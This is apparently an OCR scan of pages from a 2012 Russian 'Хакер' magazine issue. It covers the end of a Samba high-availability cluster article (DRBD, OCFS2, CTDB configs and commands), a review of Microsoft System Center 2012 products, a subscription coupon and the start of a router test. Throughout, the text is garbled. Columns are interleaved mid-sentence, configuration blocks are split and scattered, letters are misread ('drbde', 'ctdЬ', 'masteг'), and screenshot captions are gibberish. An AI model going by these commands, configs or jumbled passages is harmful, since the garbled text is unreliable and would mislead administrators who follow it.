ситуацию, когда один из узлов кластера выходит из строя. Как

один из узлов выйдет из строя, CTDB автоматически приевсит его

ведет себя система в этом случае? Первым под удар попадает

I Р-адрес другому узлу, и клиенты будут работать, как ни в чем не

наше DRВО-устройство, но благодаря режиму masteг/masteг

бывало.

смерть одного из узлов никак не отразится на функциональ­

Этих настроек должно быть достаточно. Запускаем CTDB на

ности другого. П оэтомунедосту п ное устройство просто отклю­

обоих узлах:

чается, а второй сервер продолжает функционировать. Второй

# /etc/in i t . d/c tdb start

OCFS2. Но и здесь все заканчивается достаточно благополучно благодаря встроенному механизму фенсинга [fencingl, который

компонент, реагирующий на смерть узла, это файловая система

Если он работает нормально, то команда

<<ctdb status>> вернет

просто отключает недоступную ноду от кластера и восстанав­

что-то вроде этого:

ливает консистентность файловой системы с помощью отката

Numb er of nodes :2 pnn:0 192. 168 . 0 . 1

сбойного узла. П ри этом сам сбойный узе л отпра в ляется в пере­

незавершенных операций над файлами, проде л анными со ОК

(TНIS

загрузку [если, конечно, он не умер окончательно ! . Следующим о смерти узла узнает демон CTDB, работающий на живо м уз л е.

NODE )

Однако, в отличие от двух предыдущих компонентов пирамиды,

он поступает гораздо умнее. Он помечает мертвый узел флагом

ЧТОБЫ ВОВРЕМЯ РЕАГИРОВАТЬ НА ПАДЕНИЕ УЗЛОВ, СЛЕДУЕТ ПРИМЕНЯТЬ РАЗЛИЧНЫЕ МЕТОДЫМОНИТОРИНГА

UNHEALTHY или DISCONNEC TED, назначает его IР-адрес другому узлу и посылает всем его клиентам Т СР-пакет с нулевым номе­ ром последовательности. Это вынуждает клиентов переуста­ новить соединение с узлом, благодаря чему они автоматически перебрасываются на живой узел, даже не заметив подмены. Сам протокол

CIFS позволяет выполнить т акой трюк, в резуль­

тате чего задержка в обслуживании для клиентов составляе т

всего несколько секу н д. Ч т о дела т ь в такой си т уа ц ии админу?

126

ХАКЕР

www.epidemz.net

04/159/2012


Н еизме нн о в ы со кая д ос тупн ост ь

•lobal { usage-count no ; } common { s~ncer { rate 100Н; } } resource r0 { protocol С ; startup { wfc-timeout 15; d.egr-wfc-t i meout 50 ;

cluster: Если тебе

node count = 2 name = ocfs2

потребуется собрать кластер из более ч ем дву х машин, можно

использовать любую

node :

net allow-two- primaries; after-sb-0pri discard-zero-changes ; after- sb-1pri consensus ; after-sb-2pri disconnect ; shared-secret "123 "; cram-hmac-alg sha1 ;

распределенную

ip_port = 7777 ip_address = 192.158 .0.1 number = 1 name = node1 .cl uster . local cluster = ocfs2

ФС вроде lustгe и GlusteгFS .

..

Чтобы

Samba

работала правильно , следует

позаботиться

node:

об управлении

ip_port = 7777 ip_address = 192.158 .0 .2 number = 2 name = node2 .cluster. local cluster = ocfs2

on node1 { de vi ce / dev / drbd0 ; disk / dev / sdb ; address 10 .0.0 . 1:7788 ; meta-disk internal ;

учетными записями

пользователей . В официальном руководстве

подробно описано, как это сделать.

on node2 { /etc/dгbd.conf[+][RQ] Правим конфиг

Правим конфиг

DRBD

OCFS2

ma i l f oo@bar -s ""ho stna me· i s UNHEALTHY" . ..

Да в общем-то ничего. Если сервер упал из-за ошибок в ПО или каких - тонепреднамеренных д ействий со стороны третьих лиц

(пропало питание, не сработал UPS и так далее!, то после пере­

healthy) mail foo@bar -s ""hostname· i s HEALTHY" ...

загрузки узе л восстановит свое состояние автоматически. То же самое справедли в о и в отно ш ении поломки одного из внутрен­

них компонентов сервера. Е сли же умер сам жес т кий диск, то

esac

после его замены сервер достаточно просто ввести в строй. В За состоянием

большинстве случаев для этого понадобится выполнить всего

CTDB

в режиме реального времени можно на­

блюдать с помощью команды

две команды:

«ctdb status>>.

Три первых строки в ее

выводе наиболее информативны, они отражают состояние узлов:

# #

ОК- узел функционирует нормально;

drbdadm create-md re drbdadm attach re

DISCONNECTED- узел недоступен; DISABLED- узел отключе н администратором,

можно вновь смонтировать раздел и перезапустить самбу и

UNHEALTHY- существуют

CTD B:

проблемы, мешающие подключить

узел к кластеру, при этом сам демон

# # #

mount /dev/ drbde /e tc / init . d/ ctdb res tart /etc / init : d/samba restart

BANNED -

CTDB

работает нормально;

узел попал в ба н из-за слишком большого количе­

ства попыток восстановить работу, скорее всего проблема в неправильной настройке С Т ОВ;

STOPPED- узел Чтобы быть в курсе событий и вовремя реагировать на падение

отключен от кластера, но принимает управ­

ляющие команды;

уз лов, следует применять различны е методы мониторинга, это мо­

PARTIALLYDNLINE- узел

жет быть что у г од но , начиная банальны м пингом по крону и закан ­

сети.

чивая специализированными система типа

однако он с по со­

бен нормально функционировать;

За т ем начне т ся синхронизац ия массива, по окончании которой

monit.

работает, нонедоступен из внеш н ей

Мы уже не раз

писали в][ о мониторинге, поэтому я не буду рассказывать об этом

Также следует обратить внимание на строку Recoveгy

mode,

подробно. Кстати, отслеживать ситуа ции с проблемами в работе

ражающую режим работы кластера. Возможные значения:

CT DB очень просто с помощью скрипта /etc/ctdЬ/not if y.sh, который

выпол няет ся в тех случаях, когда появляю т ся проблемы в работе

vNORMA L- кластер функционирует нормально. RECOVERY- производится восстановление работы

узла, и он отключается от СТОВ-кла стера. Пропи сать в скрипт

на время которого он недоступен.

от­

кластера,

можно все что угодно,- например, отправку письма админу:

В любой момент узел можно отключить от кластера с помощью

vi /etc/ctdb/notify.sh event="$1" shift

#

команды

«ctdb

disaЫe>> и вернуть с помощью

«ctdb

enaЬie>>.

I:I§I:I•J!Шi Сегодня развернуть кластер высокой доступности не так уж и

case $event iп unhealthy) ХАКЕР

сложно. Как видишь, все что для этого требуется- несколько машин, пара жестких дисков и немного свободного времени. ::Х::

127

04/159/2012

www.epidemz.net


SYN/ACK

Сергей Яремч ук lgrinderlasynack.rul

В этом году корпорация

IТ-РЕШЕНИЯ ОТ

Microsoft практически полностью

обновит линейки своих основных продуктов. Большие

MICROSOFT: ОБЗОР

изменения ждут и популярное семейство инструментов

ГЛАВНЫХ НОВИНОК 2012 ГОДА

управления

System Center, функции которого будут

максимально адаптированы к современным реалиям .

Учитывая, что все

RC

вышли точно в срок, а в ближайшее

время станет доступен

RTM,

сейчас уже вполне можно

оценить нововведения .

ХАКЕР

128

www.epidemz.net

04/159/2012


С в ежее ды ха н ие

• &

Getting started

AvailaЫ~ ~tup

~

OpUons

has not de..ected an existJnQ lnst&laьon oi а PnmiiYSite server, console on ttus computer. .,

S«.ondмy ~ ~, Slte: ~.

------

or Config~ntion

МoNger

~ tulh.-.ldolot .....

Sol\wW\OUof l*'t

r.

lnsQП а Conf\9untюn Мзмgеr Prinwy Sde

f41Ьock-.:I DCIO'I . Oo.lfl ь.r.!-.. .....

server

.......

~~-·'-~

Г-7 Use [)'Piallln5ui\.):I0n optiorls for 11 single setVef tnШia tюn -lnstal t~ ~ МanagefPiitмfySt".e

~ c..-. v.- s.-- ,... ...,._ c...g w.ь::..r..c

-Use defaut~tюn path

ioUJolo.~.........,_

r r

!nsDIII11 Configur.1tюn Мгr;аоеr Cen:ral Admnstr~ SJ!t:

r r

F....::'_. . . . . ._" . . . ____ <

В

..

МоЬiо""-nАМТ.-,...

- Cor.figu-e loal SQL SeNer vllth defo!!Ut ~ - Enoble 11 local rмnogement poll"t fOf ConfiguratiOn ~ · ЕмЬ1е common Ccnfi9uratJon ~ cLentaQettts

SCCM 2012

nоявиnась роль

Prevюus

11

*

Next>

Спи с ок рол е й с а й та

Central Administration Site

SYSTEM CENTER CONFIGURATION MANAGER 2012

SC CM 201 2 т акже

nретерпел изменения

Такой сайт не обслуживает клиентов и nоддерживает ограниченное

количество ролей IAI, Software Update Point, RSP и SHVI. Но глав н ое,

Первое, что бросается в глаза, э т о изменение списка продуктов, Configuгation. Теперь он выглядит сле­

в nодчинении CAS может быть только один основной IPrimaryl сайт,

дующим образом: Configuгation Мапаgег, Opeгations Manageг, Seгvice

тогда как ранее nоддерживалась вложен н ость нескольких Pгimary.

Manageг, Data Pгotection Manageг IDPMI, Viгtual Machine Manageг IVMMI, Oгchestгatoг и два новых продукта- Endpoint Pгotection [ранее Forefгont EPI и AppController. Центральное место в линейке з анимает SCCM 2012lтакже известен как v.Nextl, покрывающий

Secondary Site требуют наличия SQL-cepвepa !можно исnользовать бес­ nлатный Expressl. Привычных режимов Native и Mixed нет, теперь просто так и на Distгibution

практически полный цикл управления всей ИТ-инфраструктурой­

настройки. Клиент может nеребирать м ежду несколькими

установка ОС, приложений и обновлений, контроль конфигурации,

Point

входящих в семейство

System

SCCM 2012

Point.

На разные коллекции можно назначать свои

Management

внутри сайта и подключаться к доступному. Это, кстати, основные

nричины отказа от многочисленных Pгimary сайтов, так как такой подход

инвентаризациясофтаи оборудования. Поэтому с него и начнем. Требования к системе

указываем режим работы по НТТР и/или НТТРS, как для сайта в целом,

упрощает структуру, да и уменьшает количество лицензий.

немного изменились, те­

перь только 64-битные ОС, его можно установить на Win2k8/R2

Point теперь носит имя Reporting

Seгvices

Reporting Point и базируется на SQL

с MSSQL2k8SP1Ix64l или позднее. Хотя точки распространения IDP,

Repoгting Seгvices, nоэто му не получится nеренести настройки со старой

Distribution Pointl по-прежнему работают на х86 Win. Так как измени ­ лась архитектура и логика работы, апгрейд со старых версий SCCM не предусмотрен. Для миграции с SCCM 2007 на SCCM 2012 пред­ ложен мастер IMigration -7 Migгation Jobsl, который после запуска

системы. Точки Bгanch

DP уже нет как таковой, SCCM 2012 исnользует SCCM 2012 реализована новая концеnция, по­ лучившая название UCM IUseг Centгic Managementl, -такой подход сде­

технологию BгachCache. В

лал его более дружелюбным к пользователю, предлагая ему большие

будет задавать вопросы о коллекции, объектах и прочих специфи­

возможности по контролю и самостоятельному сопровождению системы

ческих настройках. Внешне сам процесс выглядит довольно просто,

! е стественно, в рамках nолитик!. Теперь именно nользователь выбирает

в результате будут перенесены основные настройки, а также образы,

приложения для установки и оnределяет, когда на компьютер будут за­

обновления, драйвера и прочее. П равда, для этого необходимо будет

гружаться обновления, указывая для этого рабочие часы в настройках.

полностью развернуть н овую инфраструктуру, в том числе переуста­

Ранее все было с точностью наоборот,- основной точкой уnравления

новить клиента, перенести ресурсы и по окончании процедуры

был комnьютер, пользователь оставался за кадром и решений никаких

выключить старые сервера. Конечно, некоторая часть данных в новой

не принимал. Новый подход видится мне более nравильным, nоскольку

консоли потребует уточнения,- например, если пакеты хранились

администратор не всегда владеет ситуацией и ориентируется лишь на

локально, понадобится указать новый nуть, хотя для их размещения

роль и групnу. Кроме того, индивидуальные требования nри большом

обычно исnользуются общие ресурсы, так что особых проблем быть не

количестве nользователей учитывать тяжело, а обновлен и е, да еще

должно. База инвентаризации не nере носится, она будет заnолнена

с nерезагрузкой, устанавливаемоевнеподходящее время, может сильно

nомешать. Если за комnьютером работает несколько пользователей,

новыми данными, поэтому не сохранится и история .

В

SCCM2012

интегрирована четвертая версия инструмента ми­

один из них назначается основным. Сами nриложения разделены на

грации учетных записей USMT IUseг State Migгation Toolkitl. Функция

обязательные и доступные IRequired или AvailaЫel, также определяется

развертывания ОС 050 IOpeгating System Deploymentl всегда была

тиn установки !локальная, терминал, виртуаль н ое App-V, Windows M oЬile

одной из сильных сторон

CABI, зависимости и nрочее. Для nоиска AvailaЫe nриложений nольза-

SCC M, с nоявлением иерархической модели

!образы не привязаны к определен н ому сайтуl нет необходимости в с охранении индивидуал ьн ых образов, сущес тв енно уnрощена ра­ б ота с

WIM.

Возможность РХЕ теnерь nоддерживается только точками

распространения ОР. Поддержка технологии lntel vРго/АМТ nозволяет nолучить достуn к железу, минуя ОС. Одной из целей разработчиков было уменьшение количества серверов, так как ранее из-за сnецифи­

ческих настроек коллекции часто требовался еще один Ргimагу

Site,

в результате даже в небольшой организации серверов могло быть неприлично много. В иерархии появилась роль Central Administгation Site ICAS, аналог Centгal Ргimагу Sitel, исnользуемая только для у правления иерархией и отчетов.

Х АКЕР

ПОДДЕРЖКА ТЕХНОЛОГИИ

INTEL VPRO/AMT ПОЗВОЛЯЕТ ПОЛУЧИТЬ ДОСТУП К ЖЕЛЕЗУ, МИНУЯ ОС 129

04/1 59/2012

www.epidemz.net


SYN\ACK

• u

~ -

s~s..~;;;::.:~

1.

Ji.

~:-'·~,::.;:·.

.:. ш и..,,"""''

~~--.... ,....::о<!!о,. - ·,_,..,"'""'

........ ...

1'"----

11!11·

-

Gentfal Pтopert.e ~

Selectthetypeoftesktocre;,te

SМICQМn'\41'\dDetMr

s,.,..,.. ~~y

т~

• 0...""V)>!.Ict+'.od1

~

001·КО!l0 1 lМ.

ДOeroi.T~skt

8 •

_...,

Commarod ine - Rll"' ll UN IXAI'UI Shd Corm'lll'ld

L ,!C<II'Idor)o~

-

. . . .....

t.<•o•gew..r.eo

·.;,

:~~

R..n i i C:Iil)l

Contolt l 11kt ~ Ait!l cotml6r'ld li'oe

fJ..>.<r.tO.кtO<)fo

Commмм:l ine

-

-s. .

'~<Cpo•a!OO<I<

D"criptюrc

·- .

T histask rllll e thelcOfМIМIC!onlheWgeted U N IXILMCompulot

,.

s. .• c.... ~OW<"ИIO'

t• ., .... o.... , ~'l'

Cc.,Pr og••"' ~• •• M~"'~'ICO"' ·i'J'O t<l"

Mo"~nagem e ntpack

'-1L•..;oor

Консоль у nравления

SCCM 2012 выnолнена

в новом стил е

вателям предложен Softwaгe Centeг, после выбора администратор может одобрить или блокировать установку. Приложение, в зависимости от

SCCM 201 2 позволяет выполнять

к оманды на * niх-сист е ма х

конкретной ситуации [пользователь работает на ПК, терминале и так далее], можетустанавливаться по - разному. Например, на ПК это будет

единственного сервера . Хотя в целях обратной совместимости ввели

локальная установка, а с терминала- виртуальная. Устанавливаемые

специальную роль

программы отслеживаются в узле Monitoгiпg, а не в

обязательно строить кластер,- администраторы могут объединять

Status Message мастера из Client Custom

Vieweг, как в случае

SCCM2007. При запуске Settings администратор указывает, на кого распространяются

настройки

-для пользователя они или для компьютера. Многие администраторы

RMS

Emul atoг. Чтобы справиться с нагрузкой, не

серверы управления в группы и для

Health

Seгvice создавать пул

ресурсов [Resouгce Pool] из нескольких Managemeпt Sегvег. В обыч­ ном режиме задачи выполняет только один из серверов пула, другие

перед развертыванием проверяют работу на тестовой группе, -теперь

подхватывают его роль только в случае недоступности. П олучается

все установки из такой среды легко импортируются на рабочие станции.

такой себе Fa iloveг C l usteг без Fai loveг Clusteг. Во время установки

Интерфейс реализует ролевую модель управления доступом Role-Based Access Contгol [RBAC], скрывая те настройки, которые недоступны поль­ зователю. Во вкладке Secuгity Roles можно найти 13 предустановленных

Notifications

ролей, при необходимости администратор может самостоятельно добав­

по умолчанию создается три пула: АО Resouгce

Pool

Assignment Resouгce Poo l, All Management Seгveгs Resouгce Pool,

и

остальные администратор может настроить самостоятельно.

Для хранения данных вместо ОЗУ [как это было на

Root MS

лять новые, ориентируясь на бизнес-структуру компании. Сами объекты,

и требовало мощного сервера] используется только БД. Консоль

коллекции, с которыми может работать роль, определяются в Secuгity

управления внешне изменилась мало, зато веб-консоль перерабс­

Scope, а раздавать права можно на уровне коллекции, а не сайта. В SCCM 2012 интерфейс консоли обновлен и выполнен в стиле MS Office, он со­

тана существенно, но осваивается легко. Кроме

Client Health lccmeval.exe], отправляющая по расписанию сообщение о его текущем

Windows, полно­ Linux и *пiх. Уже сегодня доступны пакеты управления [Management Pack] для поддержки популярных серверов приложений : Apache Tomcat, IBM WebSpheгe, Java ЕЕ, Огасlе WeЫogic, Red Hat JBoss и других. Обеспечивается диагностика и веб­ приложений, созда нных на базе .NET и J2EE и Windows Azuгe. Доступный набор командлетав PoweгShell [имя включает SCOM/ SC] теперь дает возможность управлять в том числе и *пiх - системами.

состоянии и возвращающая его в рабочее состояние в случае проблем.

Чтобы получить список всех командлетов, достаточно ввести:

стоит из так называемых Wundeгbaг, содержащих ссылки на меню управ­

ления, и уже не является ММ С. Конечно, некоторое время приходится привыкать к расположению пунктов меню, но затем новый интерфейс находишь вполне удобным и логичным. Еще одно важное изменение, - на клиенте устанавливается специальная программа

Также

SCCM 2012

получает некоторый функционал

SC AppContгo l leг,

ценно OpsMgг

2012

поддерживает

из­

вестный ,под кодовым именем Саnсего [лат. «связывать>>], позволяющий

SaaS услугами и приложениями в приватных облаках, по­ строенных на Windows Sегvег, Нурег-V и Viгtual Machine Manageг 2012, и в публичных облаках на базе Windows Azuгe. Владельцы могут разверты­ вать VM, получать доступ к ресурсам, и с пользовать несколько подписок Windows Azuгe, копировать V Н О-образы.

PS > Get-Command -Module OperationsManager

управлять

Пакет управления UNIX/Linux Shell Command Template предлагает шаблоны, позволяющие создавать правила, задания и мониторы, используя команды обо лочки непосредственно с панели OpsMgг. В сравнении с OpsMgг

2007

сам процесс настройки при помощи

мастеров- упреет. В финальном релизе данный пакет будет уста­

SYSTEM CENTER

OPERAТIONS

MANAGER 2012

навливаться по умолчанию, для

Теперь OpsMgг является основным инструментом для управления

RC

его нужно с качать и установить

отдельно.

частным облаком, включая возможности мониторинга сетевых устройств и технологию контроля производительности приложений

AVICode.

В частности, кроме серверов можно обнаруживать и отсле­

живать маршрутизаторы, в том числе отдельные интерфейсы и порты,

а также VLAN [обнаруживаются автоматически]. Поддерживает SNMPvЗ, 1Pv4/1Pv6, ведет статистику по трафику и скорости, осущест­ вляет ко нтроль работы п ротокола

HSRP и

многое другое.

В новой версии OpsMgг все сервера управления стали равно­

правными, то есть роли

Root

M anagemeпt Sегvег больше нет, кон­

фигурацию агентов вычисляет каждый с OpsMgг

2012

Management

Sегvег. Теперь

вся инфраструктура не зависит от доступности одного

MICROSOFТ

DEPLOYMENT TOOLKIT 2012

Главное нововведение в МОТ -улучшенная интеграция с

SCCM 2012 OaRT [Oiagnostic and Repaiг Toolkit, входит в Oesktop Optimization Pack]. При этом МОТ2012 полностью вписывается в новую консоль SCCM 2012 [может работать и с SCCM2007] и понимает измененную модель и АО, а также поддержка

приложений [терминальные, виртуальные и так далее!. Собственно, процесс работы с МОТ мало изменился, отличия в интерфейсе nрактически не бросаются в глаза. В настройках появились два новых

Task Sequences: Oeploy to VHO Client Task

Sequeпce и

Oep loy to VHO

ХАКЕР

130

www.epidemz.net

04/159/2012


Свеж ее ды х ани е

Ef

I!IDefault Antimalware Policy

SCCM2007 ищи в][ 08.09/09.09/01 .1о.

Schedu led scans

'----

Scan settings

~

Def ault actions

The settings thal ~о" specif~ in ll1is polic~ appl~ to all Endpoint Protection clienls ir1 the hierarch~. CLrstom policies override the defaL<II polic~.

• Установка и настройка SCOM 2007 описана в][ 08.11.

Real-time protection Exclusion settings

Процесс

развертывания

Advanced Threat overrides

Specify scheduled scan sellings

r~icrosoft

~

Active Protection Service

Definition updates

i

2007 освещен [ 09.11 .

Run а schedL<Ied scan on clienl compL<Iers:

lтrue

Scan !~ре:

1QLrick scan _:j

Scan da~:

lsaturda~

_::1

Scan time:

l2дМ

j]

Dail~

с МОТ

• Страница SCCM 2012: clck .ru/eNЗT. • Страниц а МОТ 20 12: micr osoft.com/mdt .

:::J

quick scan schedule tirne:

Check for the lalesl definition Lrpdates before rur1ning а scan:

IFalse

_::1

Starl а scheduled scan onl~ when lhe computer is idle:

lтrLre

_::1

Rar1domize ll1e schedLrled scan starl limes (wilhin 30 minules):

IFalse

_::1

Force а definilion L<pdale if the clienl compuler is offline for more than two consecutive scheduled updates:

1True

3

Limil CPU L<sage during scans lo (%):

lso

3

ок

FEP

в]

• Подробно о работе 2010 читай в][ 10.09.

_::1

_:.!

Run а dail~ qLrick scar1 or1 client computers:

Наст ро йка ска н и р ов ания

Обзор

во з можност е й

Scheduled scans

Cancel

SCEndpoint Protection 2012

Sегvег Task Sequence [развертывать VO I, клиентский ПК или сервер!. Конечно, при помощи МОТ

2010 также

было возможно произвести

P2V миграцию, задействуя Sysiпteгпal Oisk2VHO [на Tech Net доступна

Нововведений очень много, и они затронули все без исключе н ия подкомпон е нты сервера. Одни направлены на повышение произво­ дительности и доступности, другие позволили расширить круг задач.

инструкция clckгu/ЮOp l, но процесс не совсем тривиален и не всем

К слову, в тестировании СТР-версии участвовало более

понятен. Теперь зто стан д артная операция, все настройки которой

зователей, которые высказали свое мнение по поводу исправлений.

выполняются за несколько кликов мышкой. Также заявлено, что

Приведем лишь некоторы е , наиболее важные.

МОТ

2012

будет поддерж и вать грядущую ОС

Win8.

Используемый для

100 000

Сисадмины наверняка оценят п оддержку установк и н а

поль­

Win 2k8 R2

редактирования установок в МОТ_ F O L O ER /Scгipts/ U D I Wizaгd _Config.

в режиме Sегvег Саге: теперь для развертывания SQL-cepвepa не тре ­

xml инструмент UO I Oesigneг [Useг-Oгiven lnstallation, nоявился в МТО2010 Update 11 nолучил новый интерфейс и возможности. Так вместо двух сценариев из ко р обки теперь их т ри: New Compute г, Refгesh и Replace. д д ми н истра т ор может n р осмотреть список всех

буетсяграфическаяоболочка.Представленонесколькоинструментов

сценариев в одном окне и изме н ить распо л ожение простым перета­

миграции: Upgгade Advisoг, Distгibuted Replay и Migгation Assistant [SSMAI . Базирующаяся на концепции групп д оступности [Avai l a Ы iity Gгoupsl технология HADR [High-AvailaЫiity and Disasteг R ecoveгyl по з воляет повысить доступность экземпляров SQL Sегvег за счет

с киванием. Сам мастер расширяем, хотя процесс не совсем прост [на

дополнительных копий БД. Такие копии могут работать в режиме

TechNet приводится пример ко д а!. А еще - усовершенствован мастер Lite Touch, улу ч шена миграция учетной з ап иси, реализована полная поддержка WinRE. Все задачи можно решить при помощи PoweгShell. Поддержка старых ОС WinXP и Win2k3 сохранена .

«только чтение>> и использоваться, например, для отчетов, что с н имет

на г рузку с рабочей БД.

Реализована поддержка кластера на разных подсетях [SQ L Sегvег Multi-Subnet Clusteгingl. Для очистки дубликатов в дан н ых nредложен новый компонент

НОВОЕ В Вероятно,

MS SQL SERVER 2012[DENALI]

SQL Sегvег'у будет принадлежать первенство в линей­ 2012, так как его выход планируется уже весной.

к е обновлений

Х АКЕР

Data Qua lity

Seгvices. И нструменты

управления позволяют эффективно манипулировать про и зво­ дительностью в такой многопользовательской среде как частное

облако. Новый компонент Роwег View [Cгescentl с богатыми воз-

131

04 /15 9/2 01 2

www.epidemz.net


SYN\ACK с:;с File

Edit

..:J j

IEI •.... ,.

~

Vlew

Favorites

F.!lvorites

Tools

в

••

х 1 . :....

Help

.

"~

EJ Арр Controller

1

'·"1"

1

~

fill - •

~

-

~ S~tem Center 2012 ~ Ov~Ni~w

(1

r!) s~rvices iit Ubrary

0Jobs

Safety •

Tools -

Арр

Controll

4

Overview

Clouds

V irtual Machines

Page ..

last refri!-Sh. 01 38:48 РМ

StatLJS РuЬ11с

Prl\'dtf' Clouds

Clouds

+

+

7' Settings

Next Steps Cornmon Т usks

AppController nозволяет уnравлять сервисами внутри облака

можностями представления информации для анализа позволяет

сути, АррСопtгоllег призван дополнить все имеющиеся сегодня

пользователям самостоятельно строить отчеты на основе BIS M

инструменты, с которыми приходится иметь дело ад м инистра­

[Busiпess lпtelligeпce Semaпtic Model]. Семантическая модель

тору: SCVMM, SSP IViгtual Machiпe M anageг Self-Seгvice Poгtal

бизнес-аналитики BISM объединяет в себе модели данных UOM

или Solutioп Acceleгatoгl, ODTK [Dynamic Dataceпteг Toolkit ]

и табличную PoweгPivot. Улучшены механизмы полнотекстового

и консоль Azuгe Platfoгm. АррСопtгоllег позволяет владельца м

поиска: по отдельным свойствам через I Fi lteг, и NEAR, позволяю·

приложений создава ть ресурсы с использование м шаблонов

щий указать порядок следования слов и расстояние. Добавлены

и библиотек, управлять ими, отслеживать активност и , вы п ол­

новые разрешения и механизм nользователь ских серверных

нять журнал ирование всех действий и многое другое . Н а пр и м е р ,

ролей, добавлена поддержка SHA2 256/512. Также предложена SQL

разворачивать приложения могут сами менеджеры п о др азделе­

Expгess LocaiDB- легковесная версия БД с поддержкой всех функ­

ний, а ИТ-персонал просто контролирует этот процесс. К аж д ы й

ций, не требующая конфигурирования и прав администратора.

пользователь получает веб-интерфейс, где будут досту пн ы только

определенные [в зависимости от его роли! фун к ц ии.

APPCONTROLLER 2012

ЗАКЛЮЧЕНИЕ

AppContгolleг 2012- новое решение в семействе System Сепtег, предназначено для контроля приложений внутри об·

Б ольшая часть изменений носит позитивный характер, поскольку по­

лака [публичного и частного], развертывания и управления

зволяет упрост ить работу как админу, так и пользовател ям . Осталос ь

сервисами. Это единый интерфейс ко всем ЦОД и Azuгe. По

дождаться финальных релизов. Х

ЛИЦЕНЗИРОВАНИЕ ЛИНЕЙКИ SYSTEM CENTER 2012 Модель лицензирования всех продуктов линейки

System

Сеп -

tег 2012 полностью изменилась (подробнее clck.ru/ePUN ), она не

П е рв а я по з воляет управлять только двумя виртуальными ОС (на ч ас тном или п у бличном облак е ) , у второй ограничения отсутствуют.

привязывается к решению и оптимизирована nод использование

Причем в пакет лиц е нзий уж е включ е ны nрава на исnользование

в рамка х pгivate cloud. Теперь все лицензии включают в себя

се рв е ров уnравления и

право на использование всего функцианала всех nродуктов

потр е бу е т с я.

линейки . Другими словами , отдельные лицензии на nродукты исче з ли , и нет ограниче ни й

no возможностям. При зто м консоли

SQL Ser v eг, - отдельно их покупать тоже не

Суммарно стоимо с ть лицен з ии выросл а , но она нивелируется за счет того , что в н ее включ е ны лицензии на подкомnоненты.

у nравления уже не требуют лицензии . Хотя одно ограничение

Кли е нт ские лицен з ии по - пр е жнему требуются, но теперь они также

все ж е есть- каждая лицензия покрывает

объ е динены и буд ут до с тупны в рамках набора

2 физических CPU. Достуnны лишь два варианта: System Сепtег 2012 Standaгd и Data center, которые отличаются лицензированием виртуальны х сред .

System Center Client ML Suite , в который в х одят лиц е нзии для Seгvice Manager, Opeгation s Manager, Data Prote ction Manager и Orchestгatoг. Отдельно доступны

ХАКЕР

132

www.epidemz.net

04/159/2012


ГОДОВАЯ экономия

Подписка 1.

Ра зб орчиво з аполни подпи с ной купон и кви ­

12 НОМЕРОВ 6 НОМЕРОВ

танцию, выр езав их из журнала, с д елав ксе­

рокопию или расп ечатав с сайта

shop.glc.ru.

2.

Оплати подписку через любой ба нк.

3.

Вышли в редакцию копию п одписных доку­

500

2200 1260

руб.

РУБ. РУБ.

ментов- купона и квитанции- любым из

УЗНАЙ, КАК САМОСТОЯТЕЛЬНО ПОЛУЧИТЬ

нижеперечисленных способов :

ЖУРНАЛ НАМНОГО ДЕШЕВЛЕ!

• н а e-mail: subscribefag lc. r u; • по факс у : [495) 545-09-06; • почто й п о а др есу: 115280, Москва , ул. Л е нин ская Слобода, 19, Омега плаза, 5 эт ., офис NQ21,

000

ПРИ ПОДПИСКЕ НА КОМПЛЕКТ ЖУРНАЛОВ

ЖЕЛЕЗО+ ХАК ЕР+

2 DVD : 162 Р УБЛЯ

ОДИН НОМЕР ВСЕГО ЗА

<< Г ейм Л эн д », отдел подписки.

[НА 35 % ДЕШЕВЛЕ, ЧЕМ В РОЗНИЦУ) ВНИМАНИЕ! ЕСЛИ ПРОИЗВЕСТИ МОЖНО ОФОРМИТЬ С НОЯБРЯ.

ЗА 12 МЕСЯЦЕВ 3890 РУБЛЕЙ [24 НОМЕРА] ЗА 6 МЕСЯЦЕВ 2205 РУБЛЕЙ [12 НОМЕРОВ]

ЕДИНАЯ ЦЕНА ПО ВСЕЙ РОССИИ. ДОСТАВКА

ЕСТЬ ВОПРОСЫ? Пиши на i n f ofag l c .г u или звони по бесплатным те лефо­

ОПЛАТУ В СЕНТЯБРЕ, ТО ПОДПИСКУ

ЗА СЧЕТ ИЗДАТЕЛЯ, В ТОМ ЧИСЛЕ КУРЬЕРОМ

нам

ПО МОСКВЕ В ПРЕДЕЛА Х МКАД

др у ги х регионов России, абоне нто в сете й МТС. Би Л айн и Ме гафон) .

8[495)663 -82-77 [для москвичей) и 8 [800) 200-3-999 [для жителей

ПОДПИСНОЙ КУПОН ПРОШУ ОФОРМИТЬ ПОДПИСКУ НА ЖУРНАЛ « ХАКЕР »

D D

на

6

на

12

месяцев

начиная с

D

месяцев

_ _ _ _ _ _ _ _ 201

Извещение г.

ИНН

77294 1001 5

000

« Гейм Л э нд »

ОАО « Нордеа Банк », г. Москва

До ставлят ь ~ур н а л по почте

р/с

No 40702810509000132297

к/с

No 3010 1810900000000990

н а домашни и адрес

БИК

До ставлять журнал курьером:

D D

кпп

044583990

н а адрес офиса*

Плате льщик

н а домашний ад рес**

Адрес (с индексо м )

(отметь

квадрат выбранного вар и анта подписки)

Назначение платеж а Оплата журнала

Ф. И .О.

770401001

Сумма

«_ _ _ _ _ _ _ >>

2012

с

г.

Ф . И .О.

К асс ир

Подпи сь плательщи ка

АДРЕС ДОСТАВКИ: и

екс

Квитанция

ИНН

77294 1001 5

000

« Гейм Л э нд "

ОАО « Нордеа Б анк>>. г. Москва

No 30101810900000000990

БИК

квартира/офис

(

кпп

770401001

Адрес (с инд ексо м )

сумма оплаты свободном

044583990

Пл ательщик

e-mail

•а

No 40702810509000132297

к/с корпус

дом

тепефqн

р/с

none

Н азначение платежа укажи название ф1-1рмы

Оплата жур нала

и друrую необ;l(одимую информац~о~ю

• · в свободном nоле укажи другую необ:.~одимую информацию и альтернативный вариант доставки в случае отсутствия дома

с

Ф. И .О.

Кас с ир

П одпись плательщика

www.epidemz.net

Сумма

«_ _ _ _ _ _ _ >>

2012

г.


ТЕСТИРОВАНИЕ ТОПОВЫХ РОУТЕРОВ

1]

еспроводной мар ш рутизатор- это не просто коробочка,

же будем пользоваться

в которую можно «воткнуть интернет» и раздавать его

тест идет не менее минуты. На данном этапе тестирование можно

по проводам и воздуху. Такие устройства таят в себе

поделить на три составляющие:

множество интересных функций, о которых ты можешь даже и не

догадываться. В этом обзоре мы собрали самые производитель­

throughput,

для объективности . Каждый

1] Тест производительности протокола РРТР. На ПК с Microsoft Windows Server 2008 R2 Standard поднимается РРТР-сервер, затем

ные бытовые раутеры от известных компаний. Итак, втыкай свой

